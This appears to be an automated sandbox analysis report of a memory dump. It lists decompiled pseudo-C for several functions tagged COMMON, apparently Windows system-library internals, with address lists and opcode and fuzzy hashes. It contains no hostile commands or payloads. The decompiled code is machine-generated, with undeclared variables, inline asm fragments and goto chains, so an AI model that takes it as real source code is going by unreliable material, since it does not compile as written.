0x01026efb
0x01026f01
0x01026f06
0x01026f0b
0x01026f11
0x01026f1a
0x01026f22
0x01026f26
0x01026f26
0x01026f33
0x01026f41
0x01026f44
0x01026f47
0x01026f54
0x01026f65
0x01026f77
0x01026f7c
0x01026f82
0x01026f91
0x01026f99
0x01026fa3
0x01026fae
0x01026fae
0x01026fba
0x01026fbb
0x01026fbc
0x01026fc1
0x01026fc2
0x01026fd3
0x01026fd8
0x01026fd8
0x01026fdf
0x01026fe8
0x01026fee
0x01026fee
0x01026ff5
0x01026ffb
0x01026ffb
0x01027004
0x00000000
0x0102700a
0x01027004
0x01026eb3
0x01026e9c
0x01027015

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 2338a6f9662008e016e9fb7c70cb0cf1df1ff84dbdd5f8a3b99227b78bbbcafe
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: E8717C71A0021AEFCB11DFA9C984FEEBBB9FF48700F104069E945E7251DB34AA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FA52A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00FA52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E00FBEEF0(0x10979a0);
					_t104 =  *0x1098210; // 0xb42ce8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E00FBEB70(_t93, 0x10979a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E00FE9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E00FBEEF0(0x10979a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E00FBEB70(0, 0x10979a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xb42cf5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E00FDF0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E00FBEEF0(0x10979a0);
									__eflags =  *0x1098210 - _t104; // 0xb42ce8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1098210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E01024888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E00FBEB70(_t95, 0x10979a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E00FE95D0();
											L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E00FE95D0();
											L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E00FBEB70(_t93, 0x10979a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E00FE95D0();
										L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E00FE95D0();
										L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E00FDF0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x00fa52a5
0x00fa52ad
0x00fa52b0
0x00fa52b3
0x00fa52b7
0x00fa52ba
0x00fa52bf
0x00fa52c4
0x00fa52cc
0x00000000
0x00000000
0x00fa52ce
0x00fa52d9
0x00fa52dd
0x00fa52e7
0x00fa52f7
0x00fa52f9
0x00fa52fd
0x01000dcf
0x01000dd5
0x01000dd6
0x01000dd7
0x01000dd8
0x01000dd9
0x01000dde
0x01000ddf
0x01000de0
0x01000de1
0x01000de2
0x01000de5
0x01000dea
0x01000dec
0x01000f60
0x01000f64
0x01000f70
0x01000f76
0x01000f79
0x01000f79
0x00000000
0x01000f64
0x01000df2
0x01000df7
0x01000e04
0x01000e0d
0x01000e0d
0x01000e10
0x01000e1a
0x01000e1c
0x01000e4c
0x01000e52
0x01000e61
0x01000e67
0x01000e6b
0x01000e70
0x01000e76
0x01000ed7
0x01000edc
0x01000ee0
0x01000ee6
0x01000eea
0x01000eed
0x01000ef0
0x01000ef3
0x01000ef6
0x01000ef9
0x01000efe
0x01000f01
0x01000f01
0x01000f0b
0x01000f12
0x01000f16
0x01000f18
0x01000f1b
0x01000f2c
0x01000f31
0x01000f31
0x01000f35
0x01000f39
0x01000f3a
0x01000f3c
0x01000f3f
0x01000f50
0x01000f55
0x01000f55
0x01000f59
0x00fa52eb
0x00fa52f1
0x00fa52f1
0x01000e7d
0x01000e84
0x01000e88
0x01000e8a
0x01000e8d
0x01000e9e
0x01000ea3
0x01000ea3
0x01000ea7
0x01000eaf
0x01000eb3
0x01000eb9
0x01000eb9
0x01000ebc
0x01000ecd
0x01000ecd
0x00000000
0x01000eb3
0x01000e21
0x01000e2b
0x01000e2f
0x01000e30
0x01000e3a
0x01000e3f
0x01000e41
0x00000000
0x00000000
0x01000e47
0x00000000
0x01000e47
0x01000df9
0x01000dfe
0x00000000
0x00000000
0x00000000
0x01000dfe
0x00fa5303
0x00fa5307
0x00000000
0x00fa5309
0x00000000
0x00fa5309
0x00fa5307
0x00fa52e9
0x00fa52e9
0x00000000
0x00fa52e9
0x00fa530e
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: def4a32a7063d62d850f032df12c56a54c714de2cc083f317fc4db61e183c180
Instruction ID: 1a6409f8335c0e7b991df443443b95e570037c95aa1bbbdf0a83f06ce58b930e
Opcode Fuzzy Hash: def4a32a7063d62d850f032df12c56a54c714de2cc083f317fc4db61e183c180
Instruction Fuzzy Hash: 6251DFB11097829BD722EF29CC46B67BBE4FF40710F14091EF49587692E774E804EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FD2AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FD2AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1098204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1098208; // 0x1098207
				_t8 = _t57 + 0x1098208; // 0x1098207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1098450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x109821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1096d5c; // 0x7fa80654
							_t72 =  *0x1096d5c; // 0x7fa80654
							_t75 =  *0x1096d5c; // 0x7fa80654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1096d5c; // 0x7fa80654
							_t84 =  *0x1096d5c; // 0x7fa80654
							_t87 =  *0x1096d5c; // 0x7fa80654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E00FEF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x00fd2ae4
0x00fd2aec
0x00fd2aef
0x00fd2af4
0x00fd2af7
0x00fd2afd
0x00fd2b92
0x00fd2b92
0x00fd2b97
0x00fd2b9c
0x00fd2b9c
0x00fd2b03
0x00fd2b06
0x00fd2b09
0x00fd2b09
0x00fd2b0f
0x00fd2b15
0x00fd2b15
0x00fd2b1b
0x00fd2b1e
0x00fd2b21
0x00fd2b26
0x00fd2b29
0x00fd2b81
0x00fd2b84
0x00fd2c0e
0x00fd2c15
0x00fd2c24
0x00fd2c24
0x00fd2b8a
0x00fd2b8a
0x00fd2b8a
0x00fd2b8a
0x00fd2b90
0x00000000
0x00000000
0x00000000
0x00000000
0x00fd2b4a
0x00fd2b4a
0x00fd2b4d
0x00fd2b53
0x00000000
0x00000000
0x00fd2b55
0x00fd2b58
0x00fd2bb7
0x01015d1b
0x01015d37
0x01015d47
0x01015d53
0x00fd2bbd
0x00fd2bbd
0x00fd2bbd
0x00fd2bb7
0x00fd2b5d
0x00fd2c2f
0x01015d5b
0x01015d77
0x01015d87
0x01015d93
0x00fd2c35
0x00fd2c35
0x00fd2c35
0x00fd2c2f
0x00fd2b65
0x00fd2b9f
0x00fd2ba2
0x00fd2b67
0x00fd2b67
0x00fd2b69
0x00fd2b6b
0x00fd2b6e
0x00fd2bc9
0x00fd2bcc
0x00fd2bcf
0x00fd2bd4
0x00fd2bd6
0x00fd2bd6
0x00fd2bdb
0x00fd2c02
0x00fd2c05
0x00fd2c07
0x00000000
0x00fd2c07
0x00fd2be0
0x00fd2c00
0x00fd2c3f
0x00fd2c3f
0x00000000
0x00fd2c00
0x00fd2be5
0x00fd2be7
0x00fd2bec
0x00fd2bf4
0x00fd2bf6
0x00000000
0x00fd2bf6
0x00fd2b70
0x00fd2b76
0x00fd2b2b
0x00fd2b2b
0x00fd2b2d
0x00fd2b2f
0x00fd2b32
0x00fd2b35
0x00fd2b3a
0x00000000
0x00fd2b40
0x00fd2b43
0x00fd2b45
0x00fd2b47
0x00fd2b4a
0x00fd2b4d
0x00fd2b53
0x00000000
0x00000000
0x00000000
0x00fd2b53
0x00fd2b78
0x00fd2b78
0x00fd2b7b
0x00fd2b7e
0x00000000
0x00fd2b7e
0x00fd2b76
0x00fd2ba5
0x00fd2ba5
0x00fd2ba8
0x00fd2bad
0x00000000
0x00000000
0x00fd2baf
0x00fd2baf
0x00fd2bc2
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de15ad7d407eacf166869e94ac5fc1002d17258f682ed5433fb1181a6015ac09
Instruction ID: bb67cccb3b7a39894257f0fc0fc410aa6414defeae8065b32c695e4be70d8e4e
Opcode Fuzzy Hash: de15ad7d407eacf166869e94ac5fc1002d17258f682ed5433fb1181a6015ac09
Instruction Fuzzy Hash: 5951AE76A001158FCB58DF1CC8909BDB7B2FBE8700719845BE8969B314D775AE41EBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0106AE44, Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0106AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0106C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0106ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0106FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0106EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E00FC7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01061608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01071536(0x1098ae4, (_t74 -  *0x1098b04 >> 0x14) + (_t74 -  *0x1098b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0106C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0106A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0104CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0106ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x0106ae44
0x0106ae4c
0x0106ae53
0x0106ae55
0x0106ae5c
0x0106ae64
0x0106ae68
0x0106ae75
0x0106ae75
0x0106ae78
0x0106ae7a
0x0106ae7c
0x0106ae7f
0x0106aea8
0x0106aeab
0x0106aead
0x00000000
0x00000000
0x0106aeb3
0x0106aeb8
0x0106aebb
0x0106aebd
0x00000000
0x0106ae81
0x0106ae88
0x0106ae8f
0x0106ae9b
0x0106ae96
0x0106ae96
0x0106ae96
0x0106aea0
0x0106aea3
0x0106aebf
0x0106aebf
0x0106aec3
0x0106aec9
0x0106af0d
0x0106af14
0x0106af3d
0x0106af3d
0x0106af41
0x0106af44
0x0106af67
0x0106af67
0x0106af6a
0x0106afca
0x0106afd1
0x00000000
0x0106afd1
0x0106af6c
0x0106af6d
0x0106af75
0x0106af7c
0x0106af7e
0x0106af80
0x0106af85
0x0106af87
0x0106af99
0x0106af89
0x0106af92
0x0106af92
0x0106af9e
0x0106afa1
0x0106afa3
0x0106afa9
0x0106afb0
0x0106afb2
0x0106afb4
0x0106afbc
0x0106afbc
0x0106afb4
0x0106afb0
0x00000000
0x0106afa1
0x0106af4f
0x0106af57
0x0106af5c
0x0106af5e
0x00000000
0x00000000
0x0106af60
0x0106af64
0x0106af64
0x00000000
0x0106af64
0x0106af1a
0x0106af25
0x00000000
0x00000000
0x0106af27
0x0106af28
0x0106af33
0x00000000
0x0106aed0
0x0106aed0
0x0106aed2
0x0106aee1
0x0106aee4
0x00000000
0x00000000
0x0106aee6
0x0106aeec
0x00000000
0x00000000
0x0106aefb
0x0106af07
0x0106afd3
0x0106afdb
0x0106afdb
0x00000000
0x0106af07
0x0106aed6
0x0106aed8
0x0106aedf
0x00000000
0x00000000
0x00000000
0x0106aedf
0x0106aec9

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a472b59979a9940ffd5117165b84331fe4a1cfb8b1802ffce7661160a466963
Instruction ID: 4fd7d7d6d5dc073f89b1457aa564db3e5c4ef54945b148e63e13c3dc8b3bd291
Opcode Fuzzy Hash: 0a472b59979a9940ffd5117165b84331fe4a1cfb8b1802ffce7661160a466963
Instruction Fuzzy Hash: 0A41D3B1700211DBE726AB69C894B7BB7DEAF84720F048259F996A72D1DB34D801C792

Uniqueness

Uniqueness Score: -1.00%

Function 00FCDBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00FCDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E00FACC50(E00FA4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E00FC7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01078ED6(_t102, _t98);
						}
						_t76 = _v44;
						E00FC2280(_t58, _v44);
						E00FCDD82(_v44, _t102, _t98);
						E00FCB944(_t102, _v5);
						return E00FBFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1098628; // 0x0
							_v28 = _t67;
							_t68 =  *0x109862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1098628; // 0x0
						_t105 = _v28;
						_t80 =  *0x109862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x106fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x00fcdbe9
0x00fcdbf2
0x00fcdbf7
0x00fcdbf9
0x00fcdbfc
0x00fcdc00
0x00fcdc03
0x00fcdc14
0x00fcdd54
0x00fcdd54
0x00fcdd54
0x00fcdc18
0x00fcdc1d
0x00fcdc1d
0x00fcdc32
0x00fcdc3b
0x00fcdc3e
0x00fcdc46
0x00fcdd5b
0x00fcdd62
0x00fcdd64
0x00fcdd67
0x00fcdd69
0x00fcdd6b
0x00fcdd6e
0x00fcdd70
0x00fcdd73
0x00fcdd73
0x00000000
0x00fcdc4c
0x00fcdc4e
0x01013ae3
0x01013ae8
0x01013aea
0x00fcdce7
0x00fcdce9
0x00fcdcec
0x00fcdcee
0x00fcdcf0
0x00fcdcf3
0x00fcdcf5
0x01013af2
0x01013af5
0x01013af5
0x00fcdd06
0x00fcdd08
0x00fcdd0b
0x00fcdd12
0x01013b08
0x00fcdd18
0x00fcdd18
0x00fcdd18
0x00fcdd20
0x00fcdd23
0x01013b16
0x01013b16
0x00fcdd29
0x00fcdd2d
0x00fcdd36
0x00fcdd40
0x00fcdd51
0x00fcdd51
0x00fcdc54
0x00fcdc59
0x00fcdc59
0x00fcdc5e
0x00fcdc5e
0x00fcdc63
0x00fcdc66
0x00fcdc6b
0x00fcdc78
0x00fcdc7b
0x00fcdc81
0x00fcdc81
0x00fcdc83
0x00fcdc89
0x00000000
0x00000000
0x00fcdd7b
0x00fcdd7b
0x00fcdc8f
0x00fcdc8f
0x00fcdc92
0x00fcdc99
0x00fcdc9f
0x00fcdca5
0x00fcdcaa
0x00fcdcaa
0x00fcdcb3
0x00fcdcb8
0x00fcdcbb
0x00fcdcc1
0x00fcdccf
0x00fcdcd2
0x00fcdcd5
0x00fcdcd7
0x00fcdcda
0x00fcdcdc
0x00fcdcdc
0x00fcdce2
0x00fcdce4
0x00000000
0x00fcdce4

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9a74814c27d4996635265fd3561e025cfb044206969e4b9d635a961d1394712
Instruction ID: c8af8e6809dcfb77d6b3c1ff7a9d0e1e4009d3d8d24340af018e7a8da18a5ab0
Opcode Fuzzy Hash: f9a74814c27d4996635265fd3561e025cfb044206969e4b9d635a961d1394712
Instruction Fuzzy Hash: A1519071E0060ADFCB14CF68C591BAEBBF5BB49320F20816ED555AB344EB35AD44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00FBEF40, Relevance: .1, Instructions: 147
COMMON

